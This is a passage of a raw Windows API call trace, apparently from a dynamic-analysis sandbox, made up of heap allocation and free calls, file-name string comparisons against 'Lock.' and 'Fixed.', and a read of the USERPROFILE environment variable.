CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9_.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0213.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0213.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0213.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0213.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0213.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0213.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0213.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0213.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0213.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0213.640] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0213.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0213.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0213.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0213.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0213.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0213.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0213.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0213.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0213.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0213.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0213.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0213.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0213.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0213.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0213.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0213.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0213.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0213.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0213.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2c) returned 0x2aa64c0 [0213.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0213.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qt2pH0rRBDAlo9_9_.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0213.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t2pH0rRBDAlo9_9_.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0213.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2pH0rRBDAlo9_9_.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0213.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pH0rRBDAlo9_9_.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0213.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H0rRBDAlo9_9_.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0213.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0rRBDAlo9_9_.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0213.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rRBDAlo9_9_.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0213.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBDAlo9_9_.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0213.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BDAlo9_9_.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0213.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAlo9_9_.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0213.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Alo9_9_.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0213.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lo9_9_.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0213.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o9_9_.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0213.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9_9_.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0213.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_9_.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0213.641] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9_.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0213.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0213.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa63e0 [0213.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0213.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa63e0 | out: hHeap=0x2af0000) returned 1 [0213.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0213.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0213.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0213.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0213.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0213.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0213.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0213.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0213.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0213.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0213.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0213.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0213.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0213.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafd8 | out: hHeap=0x2af0000) returned 1 [0213.641] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0213.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0213.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0213.641] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0213.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0213.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0213.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0213.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719b8 [0213.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0213.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0213.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0213.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0213.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0213.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0213.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0213.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0213.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0213.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0213.642] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0213.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0213.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0213.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0c8 [0213.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0213.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0213.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaff0 [0213.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0213.642] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0213.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0213.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0213.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0213.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0213.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0213.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0213.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0213.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0213.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0213.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0213.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0213.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0213.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0213.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0213.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0213.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0213.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74c58 [0213.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0213.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0213.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0213.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0213.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0213.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0213.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0213.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0213.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0213.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0213.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0213.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a78 [0213.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0213.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0213.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0213.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0213.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0213.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0213.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0213.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0213.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0213.644] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0213.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0213.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0213.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaafc0 [0213.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0213.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0213.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae58 [0213.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0213.644] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0213.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0213.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0213.644] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0213.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0213.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0213.644] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0213.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0213.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0213.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0213.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0213.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0213.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0213.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0213.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0213.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0213.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0213.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74d90 [0213.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0213.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0213.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0213.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0213.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0213.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd0) returned 0x29f7878 [0213.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74d90 | out: hHeap=0x2af0000) returned 1 [0213.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0213.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0213.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0213.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0213.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a68 [0213.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0213.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0213.645] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0213.645] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0213.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719c8 [0213.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0213.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0213.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0213.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab068 [0213.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0213.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0213.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0213.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0213.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0213.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0213.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0213.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0213.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0213.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0213.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0213.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0213.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0213.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0213.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0213.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0213.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0213.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0213.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0213.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0213.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0213.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0213.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0213.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0213.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0213.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0213.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0213.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0213.647] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0213.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0213.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0213.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0213.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0213.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0213.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0213.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0213.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0213.647] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0213.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0213.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0213.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0213.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0213.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0213.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0213.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0213.647] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0213.648] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0213.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0213.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0213.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0213.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 